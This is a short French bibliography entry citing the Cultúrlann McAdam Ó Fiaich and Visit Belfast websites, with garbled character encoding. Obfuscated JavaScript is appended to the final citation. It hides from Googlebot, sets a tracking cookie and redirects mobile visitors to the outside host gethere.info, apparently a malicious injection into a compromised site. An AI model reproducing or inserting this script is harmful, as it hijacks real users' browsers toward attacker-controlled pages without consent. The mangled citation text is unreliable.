CultA?rlann McAdam A� Fiach (2004-2016)[En ligne] URL: http://www.culturlann.ie/en/, consultA� le 29 mars 2016.

Fun facts:
1) CultA?rlann McAdam A� Fiach (2004-2016) [En ligne] URL: http://www.culturlann.ie/en/
ConsultA� le 15 avril 2016.
2) Visit Belfast: The Official Visitor Website [En ligne] URL:
http://visitbelfast.com/things-to-do/member/culturlann-mcadam-o-fiaich
ConsultA� le 15 avril 2016.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}